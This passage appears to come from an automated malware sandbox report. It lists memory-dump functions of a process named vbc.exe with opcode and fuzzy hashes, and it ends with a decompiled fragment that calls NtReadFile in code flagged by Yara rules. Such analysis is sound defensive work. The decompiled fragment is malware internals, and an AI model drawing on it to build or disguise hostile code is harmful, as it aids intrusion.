                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 3vyo
                                                                                                                                                                • API String ID: 0-2958435015
                                                                                                                                                                • Opcode ID: 7df03a298dade358299950de035e0f88a8702f5ed6e806897957aa9d98448440
                                                                                                                                                                • Instruction ID: c3170a0f9bd0f5ac372d346559f0e785a51990ddacfc3bb3cdb07b895d8b75f9
                                                                                                                                                                • Opcode Fuzzy Hash: 7df03a298dade358299950de035e0f88a8702f5ed6e806897957aa9d98448440
                                                                                                                                                                • Instruction Fuzzy Hash: 73D13A74E05259DFCB10CFA9D984A9DF7B2BF89304F2485A9E409AB316D7349E41CF50
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 004719E7, Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: &B A
                                                                                                                                                                • API String ID: 0-1130111988
                                                                                                                                                                • Opcode ID: a92e3a2636ae876ed6cc1637dc129eb9ae58589d3579c29e3d0713e379001c72
                                                                                                                                                                • Instruction ID: 9026a3978aa9b355a447133da07641768f92e372bb2304cee569d4e0673e9df2
                                                                                                                                                                • Opcode Fuzzy Hash: a92e3a2636ae876ed6cc1637dc129eb9ae58589d3579c29e3d0713e379001c72
                                                                                                                                                                • Instruction Fuzzy Hash: DA614971E05669CBDB28CF66C9407EDF7B6BBC9300F10C6AAC40DA7224E7745A868F05
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007ED8C0, Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: .{6e
                                                                                                                                                                • API String ID: 0-2378793986
                                                                                                                                                                • Opcode ID: 6157a3779d0491f8b59eecf6caebff5cef9fd9ab57c6313abe51fce0e323dd34
                                                                                                                                                                • Instruction ID: 929da4b59f334936b85375fc5dd4fcfe5c1c5be3752f3a528abd1ea4002855a9
                                                                                                                                                                • Opcode Fuzzy Hash: 6157a3779d0491f8b59eecf6caebff5cef9fd9ab57c6313abe51fce0e323dd34
                                                                                                                                                                • Instruction Fuzzy Hash: 85514870E0224A8FCB14CFEAC8446EEFBF6EB88310F14D425E515A7255D738AA418FA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00471C5A, Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: &B A
                                                                                                                                                                • API String ID: 0-1130111988
                                                                                                                                                                • Opcode ID: 8ede22e1e7d1a07d7993b05407633ef5e31c5baa6b95f1dad453457f39892560
                                                                                                                                                                • Instruction ID: 08659769e1a876b874cf3ab51b8dbbc95111f5193ea51238cd42a5e067716f29
                                                                                                                                                                • Opcode Fuzzy Hash: 8ede22e1e7d1a07d7993b05407633ef5e31c5baa6b95f1dad453457f39892560
                                                                                                                                                                • Instruction Fuzzy Hash: C1512770E4566ACBDB24CF25D944BD9F7B6BB89300F10C6E6C11EB2620E7745AC58F14
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007ED428, Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 07f1bc22d1d32a5b0c429d9af65718e8d0e89af5896164654599767ce7599367
                                                                                                                                                                • Instruction ID: 566788628e8305e61f13641265ccbbd5a27a961216d8141ad3ab78382d52a9b8
                                                                                                                                                                • Opcode Fuzzy Hash: 07f1bc22d1d32a5b0c429d9af65718e8d0e89af5896164654599767ce7599367
                                                                                                                                                                • Instruction Fuzzy Hash: 9FA12674E022598BCB54CFEAC5845DEFBF2BF89314F248566D419AB358E7349D028B60
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007EDB58, Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 4da419b9e7ef99acd3eb11de0a384e7650aa88703756154536022ece471de020
                                                                                                                                                                • Instruction ID: 928eaa2d9b314b0ad2bc2e9071305d7e426e5638066a68cfc09dabe30ea03ae7
                                                                                                                                                                • Opcode Fuzzy Hash: 4da419b9e7ef99acd3eb11de0a384e7650aa88703756154536022ece471de020
                                                                                                                                                                • Instruction Fuzzy Hash: 41A14A74E021598FCB24CFA9D980AAEFBB2BF89300F24C569D419A7216D7349D41CF61
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E7538, Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: bcad36969fa659fee248ead611227e36f1236f865ad638beac699cf4a872ec81
                                                                                                                                                                • Instruction ID: 11f3d188e9c9174e7395555838a782619fad6eab262f86395c0c95e4c8488a1a
                                                                                                                                                                • Opcode Fuzzy Hash: bcad36969fa659fee248ead611227e36f1236f865ad638beac699cf4a872ec81
                                                                                                                                                                • Instruction Fuzzy Hash: 6B810174E162499FCB08CFAAD58499EFBF1FF89310F14856AE419AB321D734AA41CF50
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E5170, Relevance: .2, Instructions: 190COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 47a937b57649c65dd384f084634ae1ffd3e26b959e61bc2ec0c0497bf3ec50dd
                                                                                                                                                                • Instruction ID: e7e4de3dd2e450607499c1ad90a17e503f08a3dfd14fa749c15a78f09ec08913
                                                                                                                                                                • Opcode Fuzzy Hash: 47a937b57649c65dd384f084634ae1ffd3e26b959e61bc2ec0c0497bf3ec50dd
                                                                                                                                                                • Instruction Fuzzy Hash: FC813970E0668EDFCB08CF96D4809AEFBB1FF89314F24852AD515AB254D3389A41CF95
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E7548, Relevance: .2, Instructions: 174COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2cc98e78a2e5303baf885cdcc22eb4e49e0a1ed68f69f3cd3100e104c59bf539
                                                                                                                                                                • Instruction ID: 5787f7bbc5b9e39f1880529b4d011e8ce14e60c957fd82331c9b22e0b813fc4e
                                                                                                                                                                • Opcode Fuzzy Hash: 2cc98e78a2e5303baf885cdcc22eb4e49e0a1ed68f69f3cd3100e104c59bf539
                                                                                                                                                                • Instruction Fuzzy Hash: 4F71EF74E16209DFCB48CFAAD58499EFBF1FF88310F14856AE419AB224D734AA41CF50
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0039A851, Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2170926008.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 061cc89b715917b83d6397d90b7c0350d315232814f741e8bf6ecb9caebeebf0
                                                                                                                                                                • Instruction ID: 9366c4af2735623783d64617f651f237cee54646405f34641654fb6d54d1c802
                                                                                                                                                                • Opcode Fuzzy Hash: 061cc89b715917b83d6397d90b7c0350d315232814f741e8bf6ecb9caebeebf0
                                                                                                                                                                • Instruction Fuzzy Hash: 9481B378A01608CFCB45DFA8D598AACBBF1FF49305F2540A9E419AB361DB35AD45CF10
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0039A860, Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2170926008.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 75b16539c0a69b5f60e183c62d425081e84a9cbe04ebd89a395b1745215a70b6
                                                                                                                                                                • Instruction ID: b1190a1ec36179d944dcec13210a34d50f8746238cf35fde3d30c3ce51320a3c
                                                                                                                                                                • Opcode Fuzzy Hash: 75b16539c0a69b5f60e183c62d425081e84a9cbe04ebd89a395b1745215a70b6
                                                                                                                                                                • Instruction Fuzzy Hash: 0B81B278A01608CFCB45DFA8D588AACBBF1FF49305F2540A9E519AB361DB32AD41CF10
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E89B8, Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 60f87b8c024fe162fd323e102b3cbf8f1fb411440ae7e4d7490ef0022052efac
                                                                                                                                                                • Instruction ID: 5078cfb43b06fddc7505d46c6ec431a1921afcbd6593bb9cc3dc05d9b8ed9b76
                                                                                                                                                                • Opcode Fuzzy Hash: 60f87b8c024fe162fd323e102b3cbf8f1fb411440ae7e4d7490ef0022052efac
                                                                                                                                                                • Instruction Fuzzy Hash: D451F674E152599FCB44CFAAC9809EEFBF2BF89300F24856AD409B7314DB389A01CB55
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E89C8, Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: afaf2276477d969627e8f45ab5255ce5fc94b6b1f13b57ffe7b119a788bf126f
                                                                                                                                                                • Instruction ID: acd144fa757b875a0fd88e7f4fb953b9a95045d8421ec2f2e13e1e43dc5d6d3c
                                                                                                                                                                • Opcode Fuzzy Hash: afaf2276477d969627e8f45ab5255ce5fc94b6b1f13b57ffe7b119a788bf126f
                                                                                                                                                                • Instruction Fuzzy Hash: 4951F474E152599FCB44CFAAC9809AEFBF2BF89310F24C56AD409B7310DB389A018B55
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E9899, Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 927f2c9f0e791cb5baf3d48bb131181cfcef386d4c2b57a68e1e5d2c9f341188
                                                                                                                                                                • Instruction ID: ef04c8787fd02886843dfa97de4ad81526b702d41a2058609860bd606027ccc5
                                                                                                                                                                • Opcode Fuzzy Hash: 927f2c9f0e791cb5baf3d48bb131181cfcef386d4c2b57a68e1e5d2c9f341188
                                                                                                                                                                • Instruction Fuzzy Hash: 6751FF72D056998BDB29CF6B8D4429EFBF3AFC9300F14C1BA854C9B265DB344A468F11
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E8760, Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: d9307305bcff697dd2ec7e1da86d84b685dc3baf5b35c9a8c1b6a192461c3754
                                                                                                                                                                • Instruction ID: 891ff352a73b65c037f0a48362404c4ce9ff8ae710e201844b7b4c315c381146
                                                                                                                                                                • Opcode Fuzzy Hash: d9307305bcff697dd2ec7e1da86d84b685dc3baf5b35c9a8c1b6a192461c3754
                                                                                                                                                                • Instruction Fuzzy Hash: DC512974E0524A9FCB48CFA6C4815AEFBF2AF98300F24D46AC419A7354D7389A42CF95
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E8770, Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: bd693cfafd987e6c7623c3bd14f871994f2a0a7993e409f90716d57c35b1d213
                                                                                                                                                                • Instruction ID: 05321de1b22a21851cea77ef097a6914a057c7b687c49996fa68b400f3a4f9a1
                                                                                                                                                                • Opcode Fuzzy Hash: bd693cfafd987e6c7623c3bd14f871994f2a0a7993e409f90716d57c35b1d213
                                                                                                                                                                • Instruction Fuzzy Hash: F851F874E0560A9BCB48CFE6C4815AEFBF2AF98300F24D46AC519B7354E7389A41CF95
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 004731E8, Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3a05d4c720e3d0021e93d10e7d99c94d7bea54c0479dc5d364cdb551f7b77e95
                                                                                                                                                                • Instruction ID: 544d83c7d3d97d69c7479f1c6592ede53ed4f1e65c53f1ef37e42fb5a87cc4dc
                                                                                                                                                                • Opcode Fuzzy Hash: 3a05d4c720e3d0021e93d10e7d99c94d7bea54c0479dc5d364cdb551f7b77e95
                                                                                                                                                                • Instruction Fuzzy Hash: DB317434D09219DBCB10CFA5D8446FEBBF5AB49342F209467D40AF3352DB388A41AB1E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E8BF8, Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 506d5f7a7c805218d1343094021555457dba446530e4b3e7e0a5d0b6c251933a
                                                                                                                                                                • Instruction ID: 75833348ab8cead9deb416aff7083e685bca3b9a83d4450441b0eb52ecb1c703
                                                                                                                                                                • Opcode Fuzzy Hash: 506d5f7a7c805218d1343094021555457dba446530e4b3e7e0a5d0b6c251933a
                                                                                                                                                                • Instruction Fuzzy Hash: E541FCB0E0664ACFCB48CFA6C5815AEFBF2FB8D300F24D466C509B7254D7349A418BA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 004731D8, Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 4e6e9d5a7c7c00c636f0f7b15bf3b8e44920d80de0868ec9e9cb221c315906e6
                                                                                                                                                                • Instruction ID: 4a7ffe0f6a673370a05467c80ab7e0a9b7f2db160fee31674d664e0b8bcdc452
                                                                                                                                                                • Opcode Fuzzy Hash: 4e6e9d5a7c7c00c636f0f7b15bf3b8e44920d80de0868ec9e9cb221c315906e6
                                                                                                                                                                • Instruction Fuzzy Hash: 70317630D49219DFCB108FA5C8546FDBBF4AB09341F209466D40AB7352D7384A41FB1E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0047331A, Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 1b7f5dc6fd80415ce14e4b6474b999d97c914fa4bf3d700dfe051a00c80fcd1d
                                                                                                                                                                • Instruction ID: b6df42e67d61edc21793157e3812a4fc14e5659922e0bf51747c98f13926559e
                                                                                                                                                                • Opcode Fuzzy Hash: 1b7f5dc6fd80415ce14e4b6474b999d97c914fa4bf3d700dfe051a00c80fcd1d
                                                                                                                                                                • Instruction Fuzzy Hash: C0113D30D092548FDB148F75C858BEEBBF0AB4A301F24D06AD44577291CA784A89DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 004735E8, Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5696f2f5e6c7f45be2166516c19ab900922bf4ed44fb2abd69d9cf1dc21e18e0
                                                                                                                                                                • Instruction ID: e066cc0407d796f4ff9bb9beb65b9326d33fc0ae4ea00d757e8382a303aa5070
                                                                                                                                                                • Opcode Fuzzy Hash: 5696f2f5e6c7f45be2166516c19ab900922bf4ed44fb2abd69d9cf1dc21e18e0
                                                                                                                                                                • Instruction Fuzzy Hash: 29119130C05254DFCB148FA4C5587EEBBF1AB0D305F24906AD005B3390CB784A89DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0047352A, Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: b63182d6921986c70d8f6d1a0dc06941a1fe72b926536e5f31c14dacaf10f48a
                                                                                                                                                                • Instruction ID: 81241992f10b8d231db700afe229d0dbbaa4fa5762d20d2ce631e7e84c959429
                                                                                                                                                                • Opcode Fuzzy Hash: b63182d6921986c70d8f6d1a0dc06941a1fe72b926536e5f31c14dacaf10f48a
                                                                                                                                                                • Instruction Fuzzy Hash: 37119170D093559FDB11CFB5C8587EEBFF0AB4A305F2494AAD04573281CB788A88DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0047346A, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f032c76b8707b9540480907bc30456f3641c3f1e4c8248b31489ab7945ea45ae
                                                                                                                                                                • Instruction ID: e8da2eb88c0c89e91ccfc851909b6f109429adc50aed953852c3b8c0d76b72d0
                                                                                                                                                                • Opcode Fuzzy Hash: f032c76b8707b9540480907bc30456f3641c3f1e4c8248b31489ab7945ea45ae
                                                                                                                                                                • Instruction Fuzzy Hash: 19117330D052589FCB15CFB5C8187EEBFF0AF4A305F24916AD445B7281C7784A84DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00473478, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: af5dfa4538532c471fff50513b0b6a8bee4f4573ca4834583228a3cb25cb796d
                                                                                                                                                                • Instruction ID: ad92ca6c2015e1f2f92488957bf9996b623c85f858c77994d3290db30be42efb
                                                                                                                                                                • Opcode Fuzzy Hash: af5dfa4538532c471fff50513b0b6a8bee4f4573ca4834583228a3cb25cb796d
                                                                                                                                                                • Instruction Fuzzy Hash: 50115E30D042188BDB15CFA5C8087EEBAF1AB4E311F24906AD405B3290C7784A84DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00473328, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 161fc7fa8b9291a2719baa7b25d3c5a704c3ab152829d9a3a6d5472710556555
                                                                                                                                                                • Instruction ID: 4f0959c669897ff6677edcc88fbb31c9c84b119f5ded9ee83c280df8dff50e19
                                                                                                                                                                • Opcode Fuzzy Hash: 161fc7fa8b9291a2719baa7b25d3c5a704c3ab152829d9a3a6d5472710556555
                                                                                                                                                                • Instruction Fuzzy Hash: E7113030D04218CFDB14CFA5C458BEEFBF1AB4E315F24946AD405B3290CB784A84DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00473538, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 09ac5e9bed295f9fb38450b2ade950ec42cd7dcdac134cb8e422a101be61aaf5
                                                                                                                                                                • Instruction ID: e00caee1f4f19cd04d8bd7864f159740b27ddda5bd8c79699b4583955689d38c
                                                                                                                                                                • Opcode Fuzzy Hash: 09ac5e9bed295f9fb38450b2ade950ec42cd7dcdac134cb8e422a101be61aaf5
                                                                                                                                                                • Instruction Fuzzy Hash: A9112A70D052189FDB14CFA5C8587EEFBF1AB4E315F24946AD005B3290CB788A84EB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 004735F8, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: d4aca1fa784638fa3208bc29d3e0f21e29ccc37986a56225b17b31826afce4c0
                                                                                                                                                                • Instruction ID: 1d748e42a9baf090d745cdcaabaf4204a5b017231ef9eb992b433d6f3c24f410
                                                                                                                                                                • Opcode Fuzzy Hash: d4aca1fa784638fa3208bc29d3e0f21e29ccc37986a56225b17b31826afce4c0
                                                                                                                                                                • Instruction Fuzzy Hash: A8112E30D05258DBDB14CFA5C518BEEFAF1AB4D315F15906AD009B3390CB788A84DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Analysis Process: vbc.exe PID: 2276 Parent PID: 2872 vbc.exeCOMMON

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                                                                                                0x00418263
                                                                                                                                                                0x0041826f
                                                                                                                                                                0x00418277
                                                                                                                                                                0x00418282
                                                                                                                                                                0x0041829d
                                                                                                                                                                0x004182a5
                                                                                                                                                                0x004182a9

                                                                                                                                                                APIs
                                                                                                                                                                • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                • String ID: B=A$B=A
                                                                                                                                                                • API String ID: 2738559852-2767357659
                                                                                                                                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
